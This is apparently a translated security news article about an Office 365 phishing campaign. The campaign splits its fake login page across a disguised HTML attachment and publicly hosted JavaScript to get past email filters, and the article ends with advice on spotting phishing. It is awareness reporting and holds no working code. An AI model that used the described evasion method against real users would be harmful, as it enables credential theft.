The Office 365 phishing campaign uses publicly hosted JavaScript code

A new phishing campaign targeting Office 365 users is cleverly trying to circumvent email security protection by combining pieces of HTML code delivered via publicly hosted JavaScript code.

Email and phishing page

The subject of the phishing email says “price revision” and does not contain a body – only an attachment (hercus-Investment 547183-xlsx.Html) which at first glance looks like an Excel document, but is actually an HTML document containing coded text pointing to two located URL yourjavascript.com, a free JavaScript hosting service and a separate piece of HTML code.

The first JavaScript file contains HTML code that opens the HTML tag and checks the entry of the victim’s email and password, the second contains the body part of the HTML code and the code that launches the message pop-up.

These pieces of HTML code combine with the fifth that was present in the HTML attachment and open a browser focused on the phishing page:

Office 365 phishing JavaScript

The code will contain the target email address and will fill out a fake login box to make the phishing page look legitimate. The phishing site also checks the format of the email address and the length of the password, explained Trustwave SpiderLabs researcher Homer Pacag.

Once the victim submits login credentials, they are effectively compromised, and the victim is shown a website that says their account or password information is incorrect and invites them to try to log in again.

Spotting phishing sites

Needless to say, you should always be careful when evaluating unsolicited emails and you should not indiscriminately download and open attachments (or links) contained in them.

You should always look at the URL of any login page they are facing and make sure it is the same one they usually see when accessing the online service.

In addition to remembering passwords, password managers also notice phishing sites well and will refuse to imperceptibly enter the login credentials that are supposedly required.

Source